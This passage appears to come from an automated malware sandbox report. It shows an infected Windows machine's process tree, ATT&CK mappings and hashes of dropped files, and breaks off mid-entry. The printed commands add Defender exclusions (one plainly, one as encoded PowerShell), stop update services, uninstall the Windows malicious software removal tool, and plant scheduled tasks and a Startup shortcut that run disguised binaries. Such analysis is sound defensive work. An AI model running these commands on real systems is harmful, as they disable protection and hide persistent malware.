      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSecurity" /tr "C:\ProgramData\WindowsSecurity.exe"
      4⤵
      Creates scheduled task(s)
      PID:2388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAdgByACMAPgA="
    3⤵
    PID:968

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:2820
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:780
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2468
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2812
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1480
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2208
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1720
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:860
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2304
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:2180
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:328
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2508
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:1780
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2656

C:\Windows\system32\taskeng.exe
taskeng.exe {7C5E30B1-3ADF-42E9-BD51-BD7B674A3C25} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
PID:1824
- C:\ProgramData\WindowsSecurity.exe
  C:\ProgramData\WindowsSecurity.exe
  2⤵
  PID:2464
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:404
- C:\Users\Admin\AppData\Roaming\iurwevw
  C:\Users\Admin\AppData\Roaming\iurwevw
  2⤵
  PID:2472
- - C:\Users\Admin\AppData\Roaming\iurwevw
    C:\Users\Admin\AppData\Roaming\iurwevw
    3⤵
    PID:2840
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:3880
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:868
- C:\Windows\SysWOW64\0411\sppsvc.exe
  C:\Windows\SysWOW64\0411\sppsvc.exe
  2⤵
  PID:312
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:3412
- C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe
  "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe"
  2⤵
  PID:3888
- C:\Program Files (x86)\Windows Defender\lsass.exe
  "C:\Program Files (x86)\Windows Defender\lsass.exe"
  2⤵
  PID:3784
- C:\Users\Admin\AppData\Roaming\awrwevw
  C:\Users\Admin\AppData\Roaming\awrwevw
  2⤵
  PID:2560
- C:\Users\Admin\AppData\Roaming\iurwevw
  C:\Users\Admin\AppData\Roaming\iurwevw
  2⤵
  PID:3644
- - C:\Users\Admin\AppData\Roaming\iurwevw
    C:\Users\Admin\AppData\Roaming\iurwevw
    3⤵
    PID:4224
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:3364
- C:\Windows\SysWOW64\0411\sppsvc.exe
  C:\Windows\SysWOW64\0411\sppsvc.exe
  2⤵
  PID:4940
- C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe
  C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe
  2⤵
  PID:5016
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe
  "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe"
  2⤵
  PID:4596
- C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe"
  2⤵
  PID:3740
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:3716
- C:\Windows\SysWOW64\0411\sppsvc.exe
  C:\Windows\SysWOW64\0411\sppsvc.exe
  2⤵
  PID:3476
- C:\Program Files (x86)\Windows Defender\lsass.exe
  "C:\Program Files (x86)\Windows Defender\lsass.exe"
  2⤵
  PID:3852
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:4160
- C:\Users\Admin\AppData\Roaming\iurwevw
  C:\Users\Admin\AppData\Roaming\iurwevw
  2⤵
  PID:1700
- C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe
  "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe"
  2⤵
  PID:4420
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:3656
- C:\Windows\SysWOW64\0411\sppsvc.exe
  C:\Windows\SysWOW64\0411\sppsvc.exe
  2⤵
  PID:4448
- C:\ProgramData\Microsoft\PSOBPDL.exe
  C:\ProgramData\Microsoft\PSOBPDL.exe
  2⤵
  PID:5944
- C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe
  C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe
  2⤵
  PID:5140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallSetup7I" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallSetup7" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallSetup7I" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\SysWOW64\0411\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\SysWOW64\0411\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\SysWOW64\0411\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "windowsw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "windows" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "windowsw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240216030526.log C:\Windows\Logs\CBS\CbsPersist_20240216030526.cab
1⤵
PID:3116

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url" & echo URL="C:\Users\Admin\AppData\Local\GreenTech Innovations\PoseidonSense.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url" & exit
1⤵
PID:5032

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2884
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F8C0C23CDFD047C18C3F7122F02471A7 C
  2⤵
  PID:6092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
PID:5924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe

Filesize
64KB

MD5
40c327469b6d3dfc4131aaeb4d08fff6

SHA1
82d860c0ddcfb3f395bc43750f7aee74f5b41436

SHA256
b22a379b8a3b02e718e364770b476fdc390bc3a8535b8b1806cbf548f3bb7f64

SHA512
c89a896d90596df5c8af76d5307785c892b4da87a41b9554479bf8a3fb2f635307a8fc2678ba70181d036bd8e081a7cb2fa15d4d7af158db56cef6cbce7c6164

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
24ca5ea0cc7c0dae15b15a19609e1d52

SHA1
9911edd446e2046ae8ecc76c06f10daaf40ccecf

SHA256
394a072ca8853ab805ab30a348a953eee6a0cd05250068010328c58547727568

SHA512
488219d902f6d53c1603cd725a23276e0c29676bc06f8a0213ce25120544ce1bd1494e566ba3cee42b9610fede7ce89cb9ace019616b01d9787cdcda7fdaf8c5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7676e76bc4310980a0682b714e759f99

SHA1
af60ca6b69a7b822ab1a3a129a53e6cdd072ba32

SHA256
b29edcc90c98e08ff9791c8637ffa3eeeffaf1ebc475687d54cb80d7ab1cafc4

SHA512
833321f772fac0b138190fdc82f6fc5bd39c09474b6bb502ecbaea151e6af4a6fa0e1568d5fb78a020e4c51b4c6ed00630bc66b015a8f6e6f0f97843db18335b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
067a3cd48dbeb3dc7f32bb25d38d8490

SHA1
72605ed80a584e19a08ca0dcd2eba3230efa481e

SHA256
d4cfa30a382f4fdcde7f170ecc5d167144c71523f88a7157f7aa6f3f382daeef

SHA512
699f637c626f3cec57b96c522a7c7f66d7382e49c1ead5105ba7ce1883f7d0a736495980b22b72d418ab1b4389b1afc4192f4cecc21b3b83cb2b9a78de98eb41

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c73bc49abb8fe3f0d6c7927aeaa00ba4

SHA1
ee2e7e0084ba37a9a35251546812eb07951b8adf

SHA256
2c6e43e5719b53bdb81e01dabc095cfc16360e8167272abaa40c2e8f26f1eeb8

SHA512
229ecc8f0091af6fecea804b4263f661e6fbc134c7f2f68d0f9c3163e4888ea60b374b0e58dd867169a14bfebbf3c7279d5c109f4932ee50c0b8d59df18717fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
5b2b5427eaba043718260f2682a94afb

SHA1
729f1b3778437dd80cc9e901120a967b42670c5c

SHA256
93e3b1554a37bf582fc1c79b0c0f024177c7d8dd64a1e3ff0d690008edb6712d

SHA512
778cf37fcc285733fd356c47db851fed40fce8b7e2f7a6b79d9848ee7113ac9bde6153a9fdd5a16c3c269f8822e1b416da7b1c0ec073bb1058b983fdf4ba8839

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\CoinSurf.WPF.exe

Filesize
312KB

MD5
f2af5d1c111ee516d0ee51470dfbf299

SHA1
ce76ce7cd9aae406a495e680e98e9285927482be

SHA256
7d36de96b489ba8c5400b5c48f2d22fb380200edf42d6966ec43a00670d126f9

SHA512
5a425855384d96776b4a0645e0f85ac050591cc0746b329612dbf721ecf1c65438c4f0e55b3a9f294c128fe288975d87731ef94a10c2d5f92e7d567221589201

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe

Filesize
304KB

MD5
e335b9d0a88b4336ba9faf41382bc0a4

SHA1
557cf165acc8f7c57142ceaeea743be3caaf58b7

SHA256
88eeb6c853ba6471ec4d59533cd348f237cb7a733f26bfaa52874ff03cbee6ab

SHA512
8d289b171d3cf4b622df853d715d5e7ce5db0c7a26c36a9c7e25a1cf81a77c8faa62f56dc25fcd4a93f536ee0606b305a1d6c158fb11b4a20964067a260fa572

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe

Filesize
1.1MB

MD5
9bb7176137834bcb392bfa2b8b86eb6b

SHA1
068b2bff1bd1282e248ac771cb57db02c2669944

SHA256
0731383b198484d12fb30bb7c0036eda56800a70a9cfb26d15b0a0f0010a8e58

SHA512
33898b4b782c3884923f0c72892e9f2e79f22cc1beb3be5ae2b91c264e9fdf6072a8e3c13fc0b2d37f957dcf66b9721ec0b3394854f201e6264b905200333271

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.5-full.nupkg

Filesize
64KB

MD5
e43eaf437c6e7ab7a9f109c53d26013f

SHA1
56dc12e5c011ca7693eb1d5d6df47d3ffc017b95

SHA256
2bd8c56850ef581f08f3852215a908f8f70e10fa9c10507b6dd72c083844983f

SHA512
a68b4ae545aaec8ede487f0cb037321f051bc23dbc468813d5bd62cc398ea0ce4ce72e642b05fc44c11d3db3b9cd63c19c597801926c1b0ab99eed3bbf8979b2

Download Submit
C:\Users\Admin\AppData\Local\DVDBurnerXP\is-I88NU.tmp

Filesize
5.3MB

MD5
90593c11e9997dd4224cf278d5d66323

SHA1
a89583c180a66fe2c8272f8ccd9876326cb29a1e

SHA256
82aa37dde211ee28b366603cc9c74f0584ed46d57df7c06447060bfcff886a07

SHA512
93a8cdfd26b4684fbbcb6ff8487e77c4996bd48b58d38fb81fe7e243d1368342f2ed27a1219cb81a9cbed72fdd4061ace091d95c326a4c3dff84d59e9a45114a

Download Submit
C:\Users\Admin\AppData\Local\DVDBurnerXP\is-OMGN4.tmp

Filesize
2.5MB

MD5
608fc55e2116cdcb88c3cf98b206017a

SHA1
d73e406a963d160d164d686ea25611e8771adebf

SHA256
b39cf5a71b85b2cd233093ef7d55b39db025da78e080b38c070accf1436a2b4f

SHA512
8098edd9c1e399925ec0a07bcd277f8634e72d156a75f9a5af25809b0aeea8c592cd45772e756f5546e87868756a28476ec53756ec87d79b242e9f16c4df983f

Download Submit
C:\Users\Admin\AppData\Local\DVDBurnerXP\is-UV23E.tmp

Filesize
682KB

MD5
7c4c4a4d5684e8aacdc6b118a601a7bb

SHA1
64c8cc24339d73909916e303ab08a253dd49fe3f

SHA256
d20e213ef79f5f58cf6ca45812648e21612af6b82f52eeee044ea050ab32d75e

SHA512
db34326a59c7e5e809de1da9c98d5464d753dd554e9c8dddc32f164bfe9d637a5d5c6ae093905b8ca075b6801fd0d53e34e6400c7f9e1d553e33618a9baadeea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\c26a2b75d93bad1c40ba65d5dcab989a

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H21MSHMY\imagd[1].jpg

Filesize
256KB

MD5
6934452ab27d26b52bab12d6e25e7b2a

SHA1
7a65e915dc9b6950543c8169ed726ca4ded5d443

SHA256
99824122acb243ab5c44e7d05e1352caa85d395d03a67c60e69c42e23321d775

SHA512
f0066c653574e35379bc0f2d3545902896d0d0a5c7659e8c0d1dc4d3e4cb81788845f4a860291197e2b802d2ca76c003d698fdc8451a85881bd3d8fc1ed28ac6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y1K1UGYC\nss3[1].dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

Filesize
1.7MB

MD5
8b9b69e8ad4b38aa8a5841b499278b77

SHA1
e2342ec8fdeb27c7983a07834cad945e99d225a7

SHA256
b625ed0bc113c97f4c284993db70835b4690ca09c794f61ecf5498e0f0ad1d83

SHA512
a14984b6089ab602af3fa389718eb0f2a8ece210c33bbfe8eb8efce96b199cdec6ed9a09b76bd6e3915dbb267cece95f9058d918eaa8ce00c3b73fcfbbdf054d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Blowjob

Filesize
12KB

MD5
9dc0c5c0c079f8083ab5fb3f997c3165

SHA1
88a1d344f52bc05f1e645a249e1f9ab13573931a

SHA256
2479560b27db1607375c4647e0873e1dcbdf22f6d6465a6d3060c1e9e6a8a149

SHA512
04165b3edecc585d278d13979ef5a525d6920e612ab67799c300bde4a319187d681927295c6ef831c746c0a4598bc4b00792163a034ffffa3439ebedd8ea589a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Cock

Filesize
64KB

MD5
f99c27f6ce82ba40a3d8b3a681483602

SHA1
342e47898949af0f730117b0b13e302116743a8f

SHA256
e3bf730ed9213e0b8d3e42c81e6a63579b2a48e9a34d24122ccc91ff7988656e

SHA512
fa1384a452aff07eee2aae22233491590ba2007a7972f246d57e0533302592b861785cee3f390e74d5e1e37a9772d44b956391cdce38c515b0b66d29dd321c9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe

Filesize
64KB

MD5
6e07627ee15f7d0c12f607feefb16323

SHA1
40dbada8c4237768f66bc6ea2df6de872ebb3ce4

SHA256
c4fa5ee4c4b9673dcc32a9a764ce93e150e3c5430231cc7879c6354fd085ef19

SHA512
43983384dfe4113335240e1e953a4aa28c71db9e7fbda13415d75ccbe249d375f3c313dd3c92c313413ffd9e6478631ea1992fcd838e3c7344785d1d36a218a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe

Filesize
128KB

MD5
21fd54912c1d05178803a987a33bb038

SHA1
a2056a2f567cb83f6180ac5eae436ce6f249b8d1

SHA256
0763015df42bedc7f0424667e43b89ad234c46d5d3e4e3d96e67f31ea79e9d41

SHA512
e486dfb8a28c05121c60a7d4d32be7ff46131a2837ddf1dfcb9b6f27964ba245064b1c708dd47695eeb61f4a9c32a01f07ebb601184e0695074741d26a4c7150

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\6.exe

Filesize
64KB

MD5
00356113cf7ec286f99727cc0cd16aed

SHA1
40ad45efd672c7cb3dc01213c0663deec216257b

SHA256
9abe75fbfe5be0a662908a01ceb234edfe2b6dca13852b4ce9de0b39871fcaf8

SHA512
382d515dba1af45772e00c921dd70c759aad734a83043e600c34173eed62915b5939d54c90be859672d8d48917937e39e88de731d97681fca1b42fa319e1cd35

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe

Filesize
195KB

MD5
5a78962af28ad4733562fbbe0b73c8ae

SHA1
35fcf2c3ef89eb96dd3923a091d7a1404b600630

SHA256
865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0

SHA512
31aa2dcccd58051f60bbf367f7290f4d4b7505f8f5f6616d9bf576b54645422af0717960ef55f61c66d003f422375d3613a684e419843c7a1941f1e17a968264

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe

Filesize
335KB

MD5
0d29a33ddfd332a08e60b41e740a4dd1

SHA1
fdf6f43d201f027adb9f66d303cc49a4024ae490

SHA256
891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005

SHA512
6dba433832a6089cb29f6eb59a852582653332d4bbfbe5c8d9b176a91e3bd7545f2c421fd5a8e6c055b44e529d3b7172b66f790ff86b7801ef907cfba122cf1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.ini

Filesize
1KB

MD5
821ba863a9eec2d1d3844c003a7e3026

SHA1
2bb660d1149c58350f6d2233fb9ad2868181f1ab

SHA256
6a9514f6d482686153faac62d72c59f42ad42da4993b7cd4aa938e8603ceae50

SHA512
b0bf48143cf372fa72aeaaeaef5800ae75195ce6ed6bf07ae46591fe19260466f83408258fa6e309a24b7a586c23532449ec4d25cd7a96150185daa18f50d730

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
31KB

MD5
580a5617582b7b7834822acc49cf9be1

SHA1
f1e3a43ac453177e9bf517883bb08ae8a4cbfd11

SHA256
b8c707cd68f2f50cdeaf22e3cbd80af5f04613aacc1c07d66a7201405d0f9700

SHA512
d8daa88dfbb3882fdfa6724c5fd9119aafd78332add7f78f0635544a3cbb1fb9de02427d941ab3f6d9e64c208375621d2cc87a4388f002a8721a0c632e75145a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
328KB

MD5
ea869cf2bc03a0b020a73990bc777823

SHA1
af3a572cd7e4010b0cd657ba6c003442166ecbe1

SHA256
28900085cbd4e3bed2f08e4eaef691b2c1b581e26052a037adf832bb6dbe1481

SHA512
f6e87042dd1d68c362c9da52ea503d15e577f8ed2298277cc0623bd62a0ff00981262a9c0ae87c209bbdf4428c6f5c19fbce7006edf2a500da3832bc7c81c9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe

Filesize
640KB

MD5
55cbd11fc74a976708839eec3c348a5f

SHA1
f57b985e22f181cdc6d8087b572872c27f622d6a

SHA256
733e6eec55f253cbc22d8f51bbf7de90cb1eec0be2fb42fc29d5a8a8d07ac129

SHA512
